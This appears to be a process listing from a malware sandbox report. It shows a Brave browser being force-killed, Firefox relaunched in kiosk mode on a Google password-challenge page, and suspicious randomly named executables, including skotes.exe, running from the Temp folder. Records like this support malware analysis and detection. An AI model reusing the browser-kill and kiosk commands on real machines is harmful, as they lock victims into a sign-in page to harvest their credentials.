taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cabc9487-8b5d-45e6-ac4b-693bd0145402} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9549b08-465c-4989-97de-6afc9b6fcc22} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" socket

C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe

"C:\Users\Admin\AppData\Local\Temp\1012622001\c931428444.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3332 -childID 1 -isForBrowser -prefsHandle 3408 -prefMapHandle 2996 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5d894d6-17cb-408f-a00b-3179494157df} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3672 -childID 2 -isForBrowser -prefsHandle 3664 -prefMapHandle 2932 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {054b2b8a-f6cb-494e-96a8-08f7afa02a8c} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4444 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4504 -prefMapHandle 4488 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {72094ee3-57e5-4174-bc6c-3756134f6a5f} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5588 -childID 3 -isForBrowser -prefsHandle 5424 -prefMapHandle 5528 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb202526-e1c4-44bf-bd52-0d0385dfca62} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5816 -childID 4 -isForBrowser -prefsHandle 5736 -prefMapHandle 5600 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc643c2e-4d7a-4b2e-9083-375d0259b722} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5912 -childID 5 -isForBrowser -prefsHandle 5992 -prefMapHandle 5988 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1276 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb7b6797-067d-4573-97ff-85b1ab145cea} 2024 "\\.\pipe\gecko-crash-server-pipe.2024" tab

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Network


Files
